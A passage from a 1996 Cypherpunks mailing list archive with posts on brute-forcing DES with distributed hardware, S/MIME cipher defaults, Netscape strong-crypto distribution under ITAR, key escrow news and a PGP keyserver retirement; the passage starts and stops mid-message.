everybody killfiled me. Oh well.

- -rich
 [blue-ribbon disclaimer: it's called sarcasm, son, SARCASM]
 censor the internet! http://www.stanford.edu/~llurch/potw2/
 boycott fadetoblack! http://www.fadetoblack.com/prquest.htm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfacQJNcNyVVy0jxAQF8dgIArltZs6Hpa8ij9XdqVPf/5+AEogZsAh5u
Jxz7JtYoiajhpAsak8iftJpv3h/5nQ8SEpT3L4k8ZPcqCH4Y6gCQiQ==
=o3cQ
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 25 Jul 1996 07:32:11 +0800
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Brute Force attack Question
In-Reply-To: <199607241550.KAA00886@galaxy.galstar.com>
Message-ID: <Pine.LNX.3.94.960724145922.589A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 24 Jul 1996, Igor Chudov wrote:

> Suppose Alice sends letters to BoB, and they always exchange plain 
> text ASCII data. Suppose also that they use DES for encryption.
> They are afraid that Perry intercepts their messages and tries to brute
> force their DES key.
> 
> Perry has 100,000 computers (and 20,000 couriers alone:) and his brute
> force attacks are as follows: he tries all keys in succession, looks at
> the decrypted texts, and *if* the decrypted text looks like a potential
> message (has only ASCII characters for example) he looks at that key closer
> as it is likely that he has found the right key.
> 
> What is Alice and Bob decide to obscure their letters and add random
> NON-ASCII  characters at random places? They may agree to just ignore
> all non-ASCII characters, so these characters would never change the
> meaning of their letters. If they do that, Perry does not have any easy
> way to tell whether he really recovered the right plaintext or not, because
> even correct key would still produce a lot of non-ASCII characters.
> 
> If percentage of ASCII characters in all 256 byte space is 40%, Alice
> and Bob may agree to put in junk characters to make up exactly 60% of
> the message. This way messages will look like random character data.
> 
> Is there any good method for attackers to circumvent this obscurity?
> What is the general method to make a judgment whether the recovered
> text really is a plain text if Alice and Bob noisify their letters?
> 
> I can think of this: we sift through all recovered plaintexts and remove
> all non-ASCII bytes, and then do some simple testing to see whether
> the remaining ASCII data resembles normal English texts. This kind
> of testing seems to be quite expensive though, compared to just testing
> for ASCII vs. non-ascii bytes. Anything else I am missig?

If the attacker uses a known-plaintext attack, then all this is a non-issue.
However, if the attacker is using a ciphertext-only attack, looking for the
MSB to be 0 is a good way to find a correct decryption.  Also, randomness tests
could be run on recovered plaintexts.  This is why compression before
encryption is a good idea.  If the plaintext is completely random, then there
is no way to crack the ciphertext.

- -- Mark

PGP encrypted mail prefered
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMfZzibZc+sv5siulAQEjOAQAsbTWucrq0yI8W1j0C1mQHiciFsRNyabH
PatrW7m67qEy4Xgw+D7dDMURjjdkQFOAm1L4t0QCIuUNIa31H74x6e/qnNQn8WAs
VBx95B1yQ8RF86rPEMkHO78FVDeQM+/oP2Dqe2/I6dO+pj5YLJ8E1IsBJz+JrUZl
eXSDvmYNLp0=
=QfTu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 25 Jul 1996 03:25:00 +0800
To: cypherpunks@toad.com
Subject: OPS_nuk
Message-ID: <199607241530.PAA25861@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The WSJ Page Ones a loser's game about the CIA's role in 
   promoting Japanese pachinko cards to halt the surreptitious 
   funneling of betting cash to the construction of a North 
   Korean nuclear plant. And the op's nuking by the Kobe quake 
   looting of card-reading mechanisms, cracking encryption 
   codes, and counterfeiting not-so-smart cards for counter- 
   tipping the house fix. Mondex, watcher bleedin arse. 
 
   ----- 
 
   http://jya.com/opsnuk.txt 
 
   OPS_nuk 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Thu, 25 Jul 1996 13:59:33 +0800
To: "cypherpunks" <mattt@microsoft.com>
Subject: RE: Brute Force DES
Message-ID: <199607250338.UAA13937@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 24 Jul 96 06:19:10 -0800, mattt@microsoft.com wrote:

>To whittle this down to a 40-bit workload, we'd have to save 2^36
>entries* 2^8 bytes/entry = 2^39 Bytes = 512 Gig. Yes, admittedly large.
Can you say RAID?  I've had an idea for something similar to this, where
you have a VERY large database btreed using the file system and
subdirectories. This type of thing would REALLY lend itself to Unix, as
we could just mount separate drives as branches of the tree.  Now, enable
NFS and things get interesting...
>What's the cheapest form of storage, magtape? How much can you store on
>magtape? The entries can be sorted so that lookup doesn't take long even
>when you have to mount tapes. 

Hmmmm... Don't they have some of those 8mm tapes that go to 4-8GM per
tape? Anyone have access to one?


// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <s_levien@research.att.com>
Date: Thu, 25 Jul 1996 07:44:48 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape
In-Reply-To: <31F55981.3009@netscape.com>
Message-ID: <Pine.SGI.3.93.3.960724152123.24135A-100000@asparagus.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 23 Jul 1996, Jeff Weinstein wrote:

> Raph Levien wrote:
> 
> >    Of course, your hypothetical user who wants to use a 512-bit key and
> > 128-bit RC2 is still completely screwed by all currently shipping S/MIME
> > products, as well as the S/MIME spec.
> 
>   I can't find anything in the S/MIME spec that makes the combination
> of 512-bit RSA key and 128-bit RC2 (or 3DES) illegal.  The spec says
> that you must support RSA key sizes from 512 to 1024.  Am I missing
> something?

   By "screwed," I mean that, because of the default settings, a user who
wants to receive mail encrypted with ciphers stronger than 40-bit will
still receive a majority of messages encrypted at 40 bits. Since S/MIME
has not been widely deployed yet, this claim is speculation. However,
there is a lot of reason to believe it.

  The problem is not that the combination is illegal, it's that nobody
will actually configure their clients to use it.

> > >   There is another method that does not require verisign or other
> > > CAs to add key size extensions to their certs.  We can define
> > > a new authenticated attribute that gets included in Signed-Data
> > > and Signed-And-Enveloped-Data messages that indicates the
> > > user's key size and algorithm preference.  This has the advantage
> > > that the preference is selected and signed by the user.  This
> > > method was discussed at the S/MIME meeting in January at the
> > > RSA Crypto conference.  I'm a bit surprised that it never
> > > got into the Implementation Guide.  I'll make sure that
> > > we bring it up on the smime list again.
> > 
> >    I don't like the fact that your proposal leaves clients with absolutely
> > no information about symmetric cipher choice until the first round of
> > signed messages has been exchanged. In this initial round, the protocol is
> > still dependent on the global default.
> 
>   How did you get the certificate of the recipient?  I assume that you
> got it from a degenerate PKCS#7 Signed-Data message as recommended by
> the s/mime spec.  That degenerate message could contain the attribute
> I describe.  If you got the certificate by some other means, we would
> fall back to your heuristic.

   Perhaps I'm missing something here. In the model I'm assuming, if I
wanted to send you mail, the first thing I'd do is get your certificate.
Today, I'd do that by going to the VeriSign Web site, but in the near
future I would expect this lookup to be automatic. Either way, it would be
up to VeriSign to ship the algorithm preference information along with the
X.509 cert (whether by degenerate PKCS#7 or some other means). This means
that VeriSign needs to agree to ship the information in response to
queries, and also that users keep the VeriSign database up to date with
respect to algorithm preferences. This is the infrastructure requirement I
referred to, one that isn't present in my proposal.
   After the first exchange of e-mail, the problem goes away. However, I
consider the protection of the inital round to be important.

> > P.S. Can we agree not to describe 128-bit RC2 as "strong crypto" until
> > it's been subject to more serious scrutiny? It's probably a great cypher,
> > but most cautious crypto-people would far rather place their trust in
> > Triple-DES.
> 
>   Certainly.  We will definitely offer 3DES as well as RC2 in our
> product.

   Good. The point I'm making has more to do with representing 128-bit RC2
as being of comparable trustworthiness as 3DES, though, not simply of
offering the option. Since RC2 is slower than 3DES, it's not at all clear
to me why anyone would choose it.

   Just to be clear, I'm not arguing with you because I think Netscape
will ship a bad product. However, I do see a real danger that, in the
field, S/MIME will have severe security problems, mostly because people
don't understand how to use it correctly. Carefully explaining the exact
strengths and limitations of S/MIME is our best hope of it being deployed
as a strong crypto protocol. Since most of the force behind S/MIME now is
from marketing, rather than security, people, I don't see much of that
going on (as a case in point, from a technical perspective, the recent
interoperability testing has been fairly sloppy). It is my hope that
Netscape will do better.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Thu, 25 Jul 1996 02:31:25 +0800
To: "pjn@nworks.com>
Subject: RE: Distributed DES crack
Message-ID: <01BB797B.3828D900@mirage.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On 24 July 1996 12:11, pjn@nworks.com wrote:

>  You are assuming that we will not get the right equasion/code/whatever
>  untill the very end.  There is a good chance that it will only take
>  half that time...and a slim chance that we will get it with the first
>  try...

My figures were based on 2^55 tries, which is exactly half of 2^56.


- Andy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 25 Jul 1996 01:51:35 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
Message-ID: <199607241431.QAA05718@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
>   I'm also curious why these anonymous crusaders did not act
> sooner?  The US version has been available for sale in retail
> outlets for about a year now.  Was it not worth $50 to make
> your point?

If you look real carefully at ftp://utopia.hacktic.nl/pub/replay
/pub/incoming you'll notice that the "commercial" 2.01 for Win32
has actually been uploaded.

The reason that is was not done sooner is probably that it felt
more like stealing to upload software that Netscape expected you
to pay for. Now that Netscape is finally giving away strong crypto
versions to anybody who asks for it (and claims to be an American)
it isn't really stealing in the same sense anymore. It's just ITAR
we're ignoring, not Netscape's commercial interests.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Thu, 25 Jul 1996 11:49:32 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Cheap tapes vs expensive CD's (Way off topic)
In-Reply-To: <199607241726.KAA00302@mail.pacifier.com>
Message-ID: <199607242332.QAA26547@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



[ No longer Cc: cypherpunks@toad.com ]

> Isn't it odd that when music is sold, CD's are MORE expensive than cassette 
> tapes, even though you _know_ that the manufacturing cost of CD's is less?

Perceived value-add of digital recordings (more faithful reproduction,
longer life, etc.).  It is assumed that, over time, such discrepancies
will diminish as more competition show up.  Meanwhile, you get effects
like the Chinese "stealing" American intellectual property for a song.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Thu, 25 Jul 1996 02:01:36 +0800
To: cypherpunks@toad.com
Subject: Re: Distributed DES crack
Message-ID: <9607241434.AA25033@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Jul 24 16:31:44 1996

Has anyone thought about TI or Motorolas DSP-Eval-Boards (at 99$ a piece at 
40 MHz with optimized assembler they might easily outrun a PPro200)
Don't look at me that way, I know only little about DSP-Programming.

By the way, using FPGA's (as suggested earlier) at around 100 MHz should be
extremely fast (after all, on one 100000 Gate FPGA, one should be able to 
do lot of parallel things at one clock cycle -> test several keys at 
once...).
I estimate, that at reasonable cost (lets say, <$500) you should be able to 
put enough FPGAs on a board to do enough keys in parallel to equal 1 key 
per cycle, i.e. 1e8 keys/sec.
That would amount to: 7.2e8 secs ->8340 days
If you build 100 such machines you win in 3 months (without any of the 
mentioned optimisations (2e55 instead of 2e56, etc.)


- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMfYz0RFhy5sz+bTpAQGj0Af/Xto3KiZMxb4zybeRcGK3mOINTmgiBo3i
Ewbzk5V0DRmNU0j6a1GFh0hmPnHwAZoopLr0VjdiBYRKCj73AEp2FHNuWxhRdp33
KKa4qfWATJM3ESGRpNTfTQr/ruCzxbkGTtDki/j0HC4UbRi/fdjy6MinstjaIJ3t
eIcX18+SKOxmV+hzZ8qrJeHlEI3e2RPl0YscXSnHVGlHZNOFUiJB/jPz/Gs8ph9i
aZR6bv+T8UVC36CzFF/B9Syxr6QFXVM5xcZ9tAui6VyAk7GOd/O5AKG8Z51jO+OK
Nf77HxT3g3wovPz/9pC+6yr9haaokBYPDs4YrBNKA8Wtln2HgdTr3w==
=OjX2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@interactive.visa.com (Tom Rollins)
Date: Thu, 25 Jul 1996 07:50:18 +0800
To: cypherpunks@toad.com
Subject: Brute-forcing DES
Message-ID: <199607242034.QAA29999@rootboy.interactive.visa.com>
MIME-Version: 1.0
Content-Type: text


Hi,

Anyone have a FPGA chip PCI board layout that they would like to
share. Having seen the paper "Minimal Key Lengths for Symmetric
Ciphers to Provide Adequate Commercial Security", the FPGA chip
seems like a perfect addition to my pc. Count me in...

Thanks,
-tom

> Any one up for a distributed brute force attack on single DES? My 
> back-of-the-envelope calculations and guesstimates put this on the
> hairy edge of doability (the critical factor is how many machines can
> be recruited - a non-trivial cash prize would help). 

-- 
Tom Rollins   <trollins@interactive.visa.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill Olson (EDP)" <a-billol@microsoft.com>
Date: Thu, 25 Jul 1996 10:12:05 +0800
To: "'alanh@infi.net>
Subject: RE: Noise: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <c=US%a=_%p=msft%l=RED-16-MSG-960724234146Z-40061@tide19.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz writes:

>
>Phil,
>
>are you saying that you're a better businessman than Rush Limbaugh?
>
>Can we see some 1040's, please?

	
Rush Limbagh is a big fat *RICH* idiot.
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@interramp.com>
Date: Thu, 25 Jul 1996 07:54:18 +0800
To: cypherpunks@toad.com
Subject: Shell buys key escrow system from Trusted Info. Systems
Message-ID: <1.5.4.32.19960724205204.006741a0@pop3.interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Administration officials didn't return calls for comment, but it's clear
that the Clinton-Gore team have their first "testbed" for trying out key
recovery, or key escrow, proposals.

Steven Walker, president of Glenwood, Md.'s Trusted Information Systems
Inc., told Inter@ctive Week late last week that TIS will supply his
company's Gauntlet Firewall technology, complete with commercial key escrow
capabilities, to an a large multinational with headquarters outside the
United States. The multinational company will self-escrow, that is handle
all encryption keys itself, in cooperation with the British government,
sources close to the deal said. 

Walker declined to name the company, but several Washington-based sources
confirmed the buyer is Royal Dutch Shell.

The deal represent the first time that a foreign buyer has purchased a US
key escrow product  without escrowing keys in the US. Indeed, TIS has sold
only one other system for export abroad, one which involved communications
between the US and the UK with US key escrow.

Walker, widely credited with devising the controversial commerical key
escrow system now being promoted by the current administration, claimed
"there really is an important issue here in finding a balance between the
interest of government and those of industry. A policy that says anyone who
wants to export strong encryption as long as there is key recovery is an
important development."

The success of the deal and others like it could figure heavily in the
Clinton administration's ability to sell it its latest proposals on
commercial key escrow; a recent report from the National Research Council
recently warned that such efforts were unproven and required serious
examiniation before they could be deployed. Long-time critics of the
proposal have, in turn, leveled the same criticisms.

Jim Bidzos, President of RSA Data Security Inc. and a long-time foe of
administration policy said he doubted the market would rush to purchase
products like Trusted Information Systems,' but said he was slightly more
hopeful for a resolution to the controversy than he had been previously.

"I've said all along that user key escrow is the only thing that makes
sense," Bidzos said. Users who hold their own keys "can comply with any
regulation in the world - if you want to give your keys to France or whoever
you can - that's your business. If it's good enough for the CIO, it's good
enough for the CIA."

Royal Dutch Shell officials said security considerations forbade confirming
a sale had been made, but freely admitted to having had talks with TIS. The
company's interest key escrow, computer security head Nick Mansfield said,
lay principally in getting access to records after keys had been lost,
stolen or otherwise disabled.

The Gauntlet firewall, nonetheless, encrypts and decrypts messages as they
arrive; it does not store messages in encrypted form.

"To us it's not a matter of 'going along' with key escrow, it's a matter of
doing business," Mansfield said.

*********

A shorter, slightly less jargon-laden  version of this story appeared in the
7/22 issue o fInter@ctive Week. An archived copy should be on our site
(http://www.zdnet.com/intweek)  by week's end.


Will Rodger
Washington Bureau Chief
Inter@ctive Week

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfa2sUcByjT5n+LZAQE4nAf7BA5X2f3LX1KQXXygkYtaGWc6qMgDEFWA
cYlQNtVw+KS+h8hNRmpZ4KWaUJS1iwHPfwaS0XqI40gVGyZE2mYBmF6RybAkLKKV
zGXEyIlAVxKOz2FsRQ35Tg1VV5Y8NaL+YxK3uUcutLHBK/Vxq7iLcnaqRn2klfYM
6ImSKecHMU2NzaB8JGIIJbAuG7NpGmLj/O4BEP3ccoNeA3NQ1fIAujMyL12gbdPF
TUZVUOLsj5eHG1dwqRmSUdsNHcwYoQ6WFX2waIdot0Ia/nph/ERpliVjkccIsKsz
q+qDeH0fz3ZoENS/zqUy9ilHwLcAdMoiyQzlm06dZBRf+O9rqpDjKA==
=RJjm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Thu, 25 Jul 1996 10:09:59 +0800
To: mix-l@jpunix.com
Subject: Keyserver at jpunix.com is retiring
Message-ID: <199607242157.QAA27543@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

	The PGP public keyserver at jpunix.com has developed a
stability problem over the past week or two that I can't seem to
account for. The keyserver stops in the middle of a run and leaves the
lock file so all incoming key requests get backed up until I notice it
and manually fix it. Having to continually monitor the keyserver has
become burdensome and is not doing anyone any good.

	I've always been happy to provide the keyserver as a public
service to the PGP users community but, the keyserver is not getting
any better no matter what I do to try and fix it. There are no errors
generated and no log entries to point me to what the problem is.

	With this in mind, I have decided to retire the keyserver at
jpunix.com effective 07/27/96 sometime in the AM Central Standard
Time. If you have any applications that point to this server, I would
ask that you point your application to one of the other servers or
make some arrangement to use a different server.

	It's been an honor and a pleasure to provide this service and
I apologize in advance for any inconvenience this may cause.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfacNFOTpEThrthvAQGl0AQAjcBWAe4beWMCZ6yyeoxkgPqjm3hyVmgb
7DeX8/MQ8tpOG+pMzalslBfWRtOaOk9mU/q2N82gEIq6/QcEvY8yUF105+87k6h3
U7mjBnbSjIAGOHBBARo2kzzmfxqVDCoo9SW+idm94HBNeRsIeFFGndII2YHivyP7
milYetDY0b8=
=OkkS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 25 Jul 1996 05:38:41 +0800
To: cypherpunks@toad.com
Subject: STI_ngy
Message-ID: <199607241725.RAA14380@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Three techno-terrorism Stingers: 
 
   7-24-96. WaPo: "Army Shows Missile Hit Is Unlikely. SAMS 
   Not Ruled Out; Downing Jet Is Hard." 
 
      The Army has run computer simulations to determine 
      whether a U.S.-made Stinger or equivalent weapon could 
      have hit TWA 800 and has concluded it was possible but 
      not likely, defense officials said yesterday. (But read 
      Kalliste's latest.) 
 
   7-24-96. NYP: "What Made Flight 800 Explode?" 
 
      Dr. Oxley said that even the best laboratory technique 
      might miss ANFO. Ammonium nitrate is readily soluble in 
      water and would dissipate rapidly from a submerged 
      wreck. The remaining fuel oil component of the bomb 
      would be hard to distinguish from aviation fuel or other 
      petroleum products. However, an ANFO bomb would have to 
      be detonated by one of the high explosives that do not 
      dissolve in water, which would be easier to detect. 
 
   And: "Computer Expert Testifies in Terror Trial." 
 
      David Swartzendruber, an investigator for Microsoft, who 
      said the F.B.I. asked him to examine the computer's hard 
      drive and reconstitute its files, gave the jury of the 
      Yousef terrorism trial a technical tutorial on how he 
      managed to retrieve files that had been deleted. 
 
   ----- 
 
   http://jya.com/stingy.txt  (for 3, 15 kb) 
 
   STI_ngy 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Thu, 25 Jul 1996 08:13:46 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Game Theory and its Relevance to Cypherpunks
Message-ID: <199607242129.RAA00154@mccannerick-bh.mccann.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:57 PM 7/20/96 -0700, you wrote:
>
>Game theory is terribly important to Cypherpunks.

        Just to make a plug for my thesis, people can find some of this
discussed at: http://far.mit.edu/~reagle/commerce/thesis/thesis.html .

        The SanteFe Inst. references might be of particular interest with
respect to decentalized economies and such.
_______________________
Regards,            There is no greater sorrow than to recall a time of
		    happiness in misery.  -Dante
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 25 Jul 1996 11:10:12 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
In-Reply-To: <199607241431.QAA05718@basement.replay.com>
Message-ID: <v03007801ae1c71fa1202@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:31 AM -0700 7/24/96, Anonymous wrote:
>Jeff Weinstein wrote:
>>   I'm also curious why these anonymous crusaders did not act
>> sooner?  The US version has been available for sale in retail
>> outlets for about a year now.  Was it not worth $50 to make
>> your point?
>
>If you look real carefully at ftp://utopia.hacktic.nl/pub/replay
>/pub/incoming you'll notice that the "commercial" 2.01 for Win32
>has actually been uploaded.
>
>The reason that is was not done sooner is probably that it felt
>more like stealing to upload software that Netscape expected you
>to pay for. Now that Netscape is finally giving away strong crypto
>versions to anybody who asks for it (and claims to be an American)
>it isn't really stealing in the same sense anymore. It's just ITAR
>we're ignoring, not Netscape's commercial interests.

The above statement is false. You have to agree to the license for the
beta, and the release will likely have the same terms as before--you have
to buy it unless
you're a US student or some such. Netscape is NOT "giving it away". Even
the no-charge users are licensed under carefully crafted terms. And as the
copyright owner, they, not you decide on redistribution policy even for
cases where it is a no-charge copy.

So it IS stealing to redistribute without permission--it is THEIR
intellectual property and only they may decide on what terms others may
have a copy.

And yes, I'm a licensed user and paid for mine.

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 25 Jul 1996 11:06:42 +0800
To: David Rosoff <hua@chromatic.com>
Subject: Re: Kids and Computer Privacy Was  Re: No more stupid gun  thread  ...
In-Reply-To: <1.5.4.16.19960724164258.0b775f04@arc.unm.edu>
Message-ID: <v03007802ae1c730450dd@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


>At 03.48 AM 7/24/96 -0500, Scott Schryvers wrote:

>>Under Itar crypto is a weapon.
False. It is "ancillary military equipment" or some such.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 25 Jul 1996 14:42:41 +0800
To: "'Cypherpunks@toad.com>
Subject: FW: Distributed DES crack
Message-ID: <01BB79AB.20FDE7E0@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



----------
From: 	Remo Pini[SMTP:rp@rpini.com]
Sent: 	Wednesday, July 24, 1996 7:34 AM
To: 	cypherpunks@toad.com
Subject: 	Re: Distributed DES crack

-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Jul 24 16:31:44 1996

Has anyone thought about TI or Motorolas DSP-Eval-Boards (at 99$ a piece at 
40 MHz with optimized assembler they might easily outrun a PPro200)
Don't look at me that way, I know only little about DSP-Programming.

>>> DSP's are optimized for add/multiply ... and you get their 
memory-access pipelining; but I am not too sure how they'd do on a DES 
algo.  I wouldn't get too excited.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Thu, 25 Jul 1996 11:12:18 +0800
To: The Deviant <jimbell@pacifier.com>
Subject: Re: Netscape
In-Reply-To: <199607241752.KAA02103@mail.pacifier.com>
Message-ID: <v03007805ae1c7565dfa7@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 AM -0700 7/24/96, The Deviant wrote:

>(just so you'll
>know, RSA's FTP basicly has a readme file that says "the files in subdir
>of a dir thats -r+x to you, so if you're a citizen go to
>dist/usaRANDOM_NUMBER_HERE", thats it).  Then make them explain why
>Netscape should be any different.

I don't KNOW, but a reasonable speculation is because Netscape is a
complete operating package and RSAREF is a set of subroutines or (in the
case of MIT PGP, a pre/post processor). If, as I have often speculated, the
objective is to keep mass market software with strong crypto out of foreign
hands (and Netscape certainly qualifies given the number of copies out
there), then one would expect more stringent rules for it, the Microsoft
browser (when IT gets strong crypto), Lotus Notes, etc.

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 25 Jul 1996 09:43:33 +0800
To: hallam@Etna.ai.mit.edu
Subject: Re: Noise: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <9607241624.AA06524@Etna.ai.mit.edu>
Message-ID: <Pine.SV4.3.91.960724180328.18101I-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Phil,

are you saying that you're a better businessman than Rush Limbaugh?

Can we see some 1040's, please?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 25 Jul 1996 10:06:41 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: When books are outlawed
In-Reply-To: <ae1ba2580b02100469ce@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960724180436.18101J-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



<< On Our Backs magazine>>

That's "Off Our Backs".  Very much at the forefront of the 
PC-gestapo-thought-police trend.

Also has a _fabulous_ running comic strip about the reality of lesbian 
relationships. "Dykes to watch out For", if my memory serves me well.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Thu, 25 Jul 1996 09:57:37 +0800
To: mix-l@alpha.jpunix.com
Subject: Keyserver at jpunix.com is retiring
Message-ID: <Pine.NEB.3.93.960724180814.29579A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

	The PGP public keyserver at jpunix.com has developed a
stability problem over the past week or two that I can't seem to
account for. The keyserver stops in the middle of a run and leaves the
lock file so all incoming key requests get backed up until I notice it
and manually fix it. Having to continually monitor the keyserver has
become burdensome and is not doing anyone any good.

	I've always been happy to provide the keyserver as a public
service to the PGP users community but, the keyserver is not getting
any better no matter what I do to try and fix it. There are no errors
generated and no log entries to point me to what the problem is.

	With this in mind, I have decided to retire the keyserver at
jpunix.com effective 07/27/96 sometime in the AM Central Standard
Time. If you have any applications that point to this server, I would
ask that you point your application to one of the other servers or
make some arrangement to use a different server.

	It's been an honor and a pleasure to provide this service and
I apologize in advance for any inconvenience this may cause.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfacNFOTpEThrthvAQGl0AQAjcBWAe4beWMCZ6yyeoxkgPqjm3hyVmgb
7DeX8/MQ8tpOG+pMzalslBfWRtOaOk9mU/q2N82gEIq6/QcEvY8yUF105+87k6h3
U7mjBnbSjIAGOHBBARo2kzzmfxqVDCoo9SW+idm94HBNeRsIeFFGndII2YHivyP7
milYetDY0b8=
=OkkS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Thu, 25 Jul 1996 09:46:07 +0800
To: cypherpunks@toad.com
Subject: My Cypherpunk Patriotism
Message-ID: <199607242218.SAA25988@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Y'all:

I received the following fan mail today, in regards to my 
announcement of the WinSock Remailer.  In my announcement, I 
noted that I have blocked the Church of Scientology discussion 
groups alt.religion.scientology and alt.clearing.technology.  
The author shall remain anonymous:

> Please make your blocking configurable in a text file that
> the remailer reads at startup time.  Other people who install
> your remailer may not feel the need to surrender to
> the Church of Scientology's legal terrorism the way you have.

Anyone who has checked my webpage (http://www.c2.net/~winsock/)
knows that the blocking lists are entirely up to the user.

Let me state clearly that I'm just not interested in the Church
of Scientology, its supporters or detractors.  My interest is
in writing remailers and seeing that the remailers are widely
distributed.  If I involve myself in this COS mess, then I'm
distracting myself from my mission, which is writing remailers.

Fighting "wars" is for the young and strong.  Think of me as
